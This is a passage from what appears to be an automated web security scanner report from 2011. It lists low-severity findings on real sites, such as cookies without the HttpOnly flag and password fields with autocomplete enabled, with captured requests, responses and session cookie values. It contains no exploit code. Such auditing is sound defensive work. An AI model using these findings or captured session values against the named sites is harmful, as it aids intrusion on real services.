GET /en-us/about-sapient/alliances.html HTTP/1.1 Host: www.sapient.com Proxy-Connection: keep-alive Referer: http://www.sapient.com/en-us/search.html?search=xss%20contact%20faq%20phone User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.4.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:37:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:20 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 34593 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head...[SNIP]...
13.258. http://www.sapient.com/en-us/about-sapient/alliances/atg.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sapient.com
Path:
/en-us/about-sapient/alliances/atg.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:locale=en-us; expires=Fri, 16-Sep-2011 15:32:31 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/about-sapient/alliances/atg.html HTTP/1.1 Host: www.sapient.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:32:31 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22675 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head...[SNIP]...
13.259. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sapient.com
Path:
/en-us/about-sapient/corporate-social-responsibility.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:locale=en-us; expires=Fri, 16-Sep-2011 15:35:32 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/about-sapient/corporate-social-responsibility.html HTTP/1.1 Host: www.sapient.com Proxy-Connection: keep-alive Referer: http://www.sapient.com/en-us/about-sapient/alliances/atg.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; locale=en-us; rootItemAlias=SapientNitro; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.1.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; sifrFetch=true
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:35:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:35:32 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 32820 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head...[SNIP]...
13.260. http://www.sapient.com/en-us/search.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sapient.com
Path:
/en-us/search.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:locale=en-us; expires=Fri, 16-Sep-2011 15:37:09 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/search.html HTTP/1.1 Host: www.sapient.com Proxy-Connection: keep-alive Referer: http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.2.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:37:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:09 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 20346 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head...[SNIP]...
13.261. http://www.tenzing.com/atg-ecommerce-hosting.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.tenzing.com
Path:
/atg-ecommerce-hosting.asp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC HTTP/1.1 Host: www.tenzing.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache Content-Length: 27188 Content-Type: text/htmlSet-Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/ Set-Cookie: casestudiesID=3; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/ Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head...[SNIP]...
13.262. http://www2.znode.com/analytics
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www2.znode.com
Path:
/analytics
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:pi_opt_in1852=2d4456d0e1929f239244e44b; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/ visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /analytics?conly=true&visitor_id=191471275&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1 Host: www2.znode.com Proxy-Connection: keep-alive Referer: http://www.znode.com/znode-multifront/feature.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pardot=erpfv597lcoo1t2jorm9rsnvu5; visitor_id1852=191471185; __utma=58486625.433211037.1315341123.1315341123.1315341123.1; __utmb=58486625.2.10.1315341123; __utmc=58486625; __utmz=58486625.1315341123.1.1.utmgclid=CLLul7r4iKsCFQVrgwodzysJ5Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:33:56 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml" Vary: Accept-Encoding,User-Agent Content-Length: 42 Content-Type: text/javascript; charset=utf-8Set-Cookie: pi_opt_in1852=2d4456d0e1929f239244e44b; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/ Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/ X-Pardot-LB: lb-s2 Connection: close function piResponse() { } piResponse();
14. Password field with autocomplete enabled
previous
next
There are 19 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
14.1. https://bugzilla.mozilla.org/show_bug.cgi
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://bugzilla.mozilla.org
Path:
/show_bug.cgi
Issue detail
The page contains a form with the following action URL:https://bugzilla.mozilla.org/show_bug.cgi The form contains the following password field with autocomplete enabled:
Request
GET /show_bug.cgi HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Backend-Server: pp-app-bugs03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Tue, 06 Sep 2011 17:06:19 GMT Keep-Alive: timeout=300, max=1000 Connection: close X-frame-options: SAMEORIGIN Content-Length: 12117 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Search by bug number</title> ...[SNIP]... </a> <form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST" class="mini_login bz_default_hidden" id="mini_login_top" onsubmit="return check_mini_login_fields( '_top' );" > <input id="Bugzilla_login_top" class="bz_login" name="Bugzilla_login" onfocus="mini_login_on_focus('_top')" > <input class="bz_password" id="Bugzilla_password_top" name="Bugzilla_password" type="password" > <input class="bz_password bz_default_hidden bz_mini_login_help" type="text" id="Bugzilla_password_dummy_top" value="password" onfocus="mini_login_on_focus('_top')" >...[SNIP]...
14.2. https://bugzilla.mozilla.org/show_bug.cgi
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://bugzilla.mozilla.org
Path:
/show_bug.cgi
Issue detail
The page contains a form with the following action URL:https://bugzilla.mozilla.org/show_bug.cgi The form contains the following password field with autocomplete enabled:
Request
GET /show_bug.cgi HTTP/1.1 Host: bugzilla.mozilla.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Backend-Server: pp-app-bugs03 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Strict-transport-security: max-age=2629744; includeSubDomains Date: Tue, 06 Sep 2011 17:06:19 GMT Keep-Alive: timeout=300, max=1000 Connection: close X-frame-options: SAMEORIGIN Content-Length: 12117 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Search by bug number</title> ...[SNIP]... </a> <form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST" class="mini_login bz_default_hidden" id="mini_login_bottom" onsubmit="return check_mini_login_fields( '_bottom' );" > <input id="Bugzilla_login_bottom" class="bz_login" name="Bugzilla_login" onfocus="mini_login_on_focus('_bottom')" > <input class="bz_password" id="Bugzilla_password_bottom" name="Bugzilla_password" type="password" > <input class="bz_password bz_default_hidden bz_mini_login_help" type="text" id="Bugzilla_password_dummy_bottom" value="password" onfocus="mini_login_on_focus('_bottom')" ...[SNIP]...
14.3. http://digg.com/submit
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:31 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=23877 10.2.130.26 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8467 <!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8"> <title>Digg - Submit a link </title> <meta name="keywords" content="Digg, pic...[SNIP]... </script><form class="hidden"> <input type="text" name="ident" value="" id="ident-saved"> <input type="password" name="password" value="" id="password-saved"> </form>...[SNIP]...
14.4. https://login.cnbc.com/cas/login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The page contains a form with the following action URL:https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header The form contains the following password field with autocomplete enabled:
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:03:07 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Content-Length: 5684 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <div style="background-color: #ffffff; width: 330px;"> <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header"> <input type="hidden" name="lt" value="_c93742DC7-8E51-DACF-2006-E90E8F3C3F62_k6F751721-4392-885A-E4F8-81B3503C4357" />...[SNIP]... <div class="inputDiv"> <input name="password" type="password" class="notVisited" onkeydown="entsub1(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/> </div>...[SNIP]...
14.5. https://login.cnbc.com/cas/login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The page contains a form with the following action URL:https://login.cnbc.com/cas/login The form contains the following password field with autocomplete enabled:
Request
GET /cas/login HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:04:32 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88450 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left"> <form method="post" name="loginForm" action="login"> <input type="hidden" name="lt" value="_c2FBB13A9-B804-689D-A91D-586630FD8B16_kBA3C6101-34E1-55C2-CB4E-332BF7120AA6" />...[SNIP]... <div class="inputDiv"> <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/> </div>...[SNIP]...
14.6. https://login.cnbc.com/cas/login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The page contains a form with the following action URL:https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register The form contains the following password field with autocomplete enabled:
Request
GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register HTTP/1.1 Host: login.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:34 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Content-Length: 88546 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left"> <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register"> <input type="hidden" name="lt" value="_cB02421FE-411A-E96B-30ED-2D9711CC8C17_k116C7869-1B9B-CA43-E387-87BEB7F6E4CE" />...[SNIP]... <div class="inputDiv"> <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/> </div>...[SNIP]...
14.7. https://login.cnbc.com/cas/login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The page contains a form with the following action URL:https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription The form contains the following password field with autocomplete enabled:
Request
GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1 Host: login.cnbc.com Connection: keep-alive Referer: http://pro.cnbc.com/index.asp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:23 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Language: en-US Content-Length: 7033 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-...[SNIP]... <div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left"> <form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription"> <input type="hidden" name="lt" value="_c275D0947-338E-C116-8994-90DE377A9048_kE686DA16-D014-ACCF-07D2-726F8B6163E2" />...[SNIP]... <div class="inputDiv"> <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/> </div>...[SNIP]...
14.8. https://oracleus.wingateweb.com/portal/newreg.ww
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://oracleus.wingateweb.com
Path:
/portal/newreg.ww
Issue detail
The page contains a form with the following action URL:https://oracleus.wingateweb.com/portal/processLogin.ww The form contains the following password field with autocomplete enabled:
Request
GET /portal/newreg.ww?brand=jone&eve=ow&wt=ow HTTP/1.1 Host: oracleus.wingateweb.com Connection: keep-alive Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Resin/3.1.8 Cache-Control: no-cache Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 15:54:14 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache Connection: Keep-Alive Content-Length: 11209 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="expir...[SNIP]... </p><form name="loginForm" method="post" action="/portal/processLogin.ww" id="loginForm"> <fieldset>...[SNIP]... </label> <input type="password" name="password" value="" /> </div>...[SNIP]...
14.9. https://register.cnbc.com/createUser.do
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/createUser.do
Issue detail
The page contains a form with the following action URL:https://register.cnbc.com/createUser.do The form contains the following password fields with autocomplete enabled:
Request
GET /createUser.do HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:45 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8 Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/ Content-Length: 54215 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Ty...[SNIP]... <div id="mainContent" class="mainContent" align="left"> <form name="userBasicRegistrationForm" method="post" action="/createUser.do"> <input type="hidden" name="international" value="" id="international">...[SNIP]... <div class="inputDiv"> <input type="password" name="password" maxlength="20" value="" onfocus="this.className='current'; document.getElementById('pwdInfo').style.visibility = 'visible'; document.getElementById('pwdInfo').style.display = 'block'; toggleMessage('pwdChecking', 'pwdSuccess', 'pwdError'); document.getElementById('pwdChecking').style.display = 'none'; document.getElementById('pwdChecking').style.visibility = 'hidden';" id="password" class="notVisited"> </div>...[SNIP]... <div class="inputDiv"> <input type="password" name="passwordConfirm" value="" onblur="this.className='doneWith';confirmPassword(this);" onfocus="this.className='current';hideThem('pwdRight', 